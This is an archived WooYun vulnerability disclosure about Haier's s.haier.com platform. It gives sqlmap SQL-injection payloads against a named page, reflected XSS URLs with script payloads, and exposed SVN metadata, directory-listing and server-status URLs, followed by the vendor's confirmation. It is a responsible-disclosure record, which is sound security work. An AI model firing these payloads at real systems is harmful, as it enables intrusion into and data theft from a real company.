乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-13: 细节已通知厂商并且等待厂商处理中 2015-10-13: 厂商已经确认,细节仅向厂商公开 2015-10-23: 细节向核心白帽子及相关领域专家公开 2015-11-02: 细节向普通白帽子公开 2015-11-12: 细节向实习白帽子公开 2015-11-27: 细节向公众公开
问题多多
0x01 SQL注入:
http://s.haier.com/haierproject/saas/aaa.php?q=3458115
payload:
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: http://s.haier.com:80/haierproject/saas/aaa.php?q=-8538' OR 6060=6060 AND 'tiLz' LIKE 'tiLz Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://s.haier.com:80/haierproject/saas/aaa.php?q=3458115' AND (SELECT * FROM (SELECT(SLEEP(5)))CGLG) AND 'CXWe' LIKE 'CXWe Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: http://s.haier.com:80/haierproject/saas/aaa.php?q=3458115' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,0x6f4f665174687a594a45,0x7170716b71),NULL-- ---[INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.12, Apache 2.4.4back-end DBMS: MySQL 5.0.12
current user is DBA: True
0x02 SVN泄漏/haierproject/saas/目录下有好多个,下面可能不全请自行检查
http://s.haier.com/haierproject/Multimedia/upload/image/.svn/entrieshttp://s.haier.com/haierproject/saas/images/.svn/entrieshttp://s.haier.com/haierproject/saas/js/.svn/entries http://s.haier.com/haierproject/saas/phpexcel/.svn/entries
0x03 目录遍历同上基本上在/haierproject/目录下,不全请自行检查
http://s.haier.com:80/css/http://s.haier.com:80/haierproject/
0x04 XSS这个量最多,就随便举几个~
http://s.haier.com/haierproject/fankui-new/fankui/new/pinglun.php?order=r&aid=541&uid=&username=&code=ca7fa90b707b28dc4033b2125efe1de1%22%3E%3CScRiPt%3Ealert%28%27wooyun%27%29%3C/ScRiPt%3Ehttp://s.haier.com/haierproject/fankui-new/fankui/new/site-info-encrypt.php?fr=pingjia%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3Ehttp://s.haier.com/km100survey/faces/login.jsp?from=xxx%22%3E%3Cscript%3Ealert%28%27wooyun%27%29%3C/script%3Ehttp://s.haier.com/km100survey/faces/public/registers.jsp?from=xxx%22%3E%3Cscript%3Ealert%28%27wooyun%27%29%3C/script%3E
0x05 其他信息泄露:
http://s.haier.com/server-status
svn信息泄露之类的就不截图了。注入
xss
该平台问题多多建议回炉重造
危害等级:高
漏洞Rank:14
确认时间:2015-10-13 17:56
感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理
暂无